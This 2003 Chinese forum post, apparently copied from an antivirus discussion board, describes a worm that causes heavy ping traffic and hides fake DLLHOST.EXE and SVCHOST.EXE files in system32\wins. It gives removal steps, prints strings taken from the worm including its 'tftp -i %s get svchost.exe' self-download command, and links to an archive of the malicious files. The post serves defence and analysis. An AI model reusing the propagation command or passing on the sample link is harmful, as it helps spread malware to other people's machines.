近来有很多朋友都反映，机器被狂ping，请教各位大虾，是否为冲击波后遗症，亦或为其他病毒？

近来有很多朋友都反映，机器被狂ping，请教各位大虾，是否为冲击波后遗症，亦或为其他病毒？
ping的机器多数为同一网段的机器，以下内容来自金山，不知是否与此有关

如果大家在自己 的system32 目录里的WINS目录里发现DLLHOST.EXE 和SVCHOST.EXE那么你肯定中毒了。。请自己在启动里删除。。并且删除这2个文件。。传染比较快。。希望大家安装防护墙，，这是中国人自己编译的病毒
　　　　
　　　　DLLHOST.EXE里面有这样的话!
　　　　=========== I love my wife & baby ~~~ Welcome Chian~~~ Notice: 2004 will remove myself~~ sorry zhongli~~~=========== wins http://download.microsoft.com/download/6/9...980-x86-KOR.exe ; http://download.microsoft.com/download/5/8...980-x86-CHT.exe ; http://download.microsoft.com/download/2/8...980-x86-CHS.exe ; http://download.microsoft.com/download/0/1...980-x86-ENU.exe ; http://download.microsoft.com/download/e/3...980-x86-KOR.exe ; http://download.microsoft.com/download/2/3...980-x86-CHT.exe ; http://download.microsoft.com/download/a/a...980-x86-CHS.exe ; http://download.microsoft.com/download/9/8...980-x86-ENU.exe ; tftp -i %s get svchost.exe wins\SVCHOST.EXE
　　　　
　　　　如果正常，我就不是人了。。哈哈。。。这2个文件在WINS目录里。。
　　　　这决对不是玩笑！！！　　我是玩ＨＡＣＫ的。。这文件我ＳＮＩＦＦ过。。反编译过。。。我是黑客圈里叫[D]KING
　　　　
　　　　如果有什么问题，，，你可以说
　　　　
　　　　说清楚..这2个文件肯定又会给网络安全打一针强心剂!!!!
　　　　如果是XP系统,那么这文件应该是在*:\WINDOWS\SYSTEM32\WINS\里
　　　　如果是NT系统..比如2000.那么就应该是在*:\winnt\system32\wins\里
　　　　这2个文件大家想研究可以在这里下
　　　　http://hy88.nease.net/pingvirus.rar
　　　　
　　　　传染是利用TFTP上传的，，如果大家用不上这东东。完全可以删除TFTP.EXE
　　　　
　　　　
　　　　正常的SVCHOST.EXE是在SYSTEM32目录里...这个2个文件决对不正常,希望大家警惕
　　　　如果你的防护墙被PING..那么你那里有一定有机器中了!!
　　　　
　　　　这东西只攻击PING的通的计算机..希望大家安装防护墙!!!设置不允许被PING
　　　　
　　　　！！下面是解决方法 ！！！！！下面是解决方法！！！
　　　　停止这2个系统服务 打开控制面板 然后打开管理工具 打开 服务
　　　　看到这2个服务就停止他们
　　　　Network connections Sharing
　　　　WINS Client
　　　　然后到WINS目录里删除这2个文件。。安装防护墙
　　　　
　　　　修改人 dking - 2003年08月18日18:50
　　　　
　　　　FROM 金山毒霸讨论区
　　　　http://bbs.kingsoft.net/index.php?act=ST&f=3&t=227591&s=2c7eca8f1cfff70fa592be97340215cf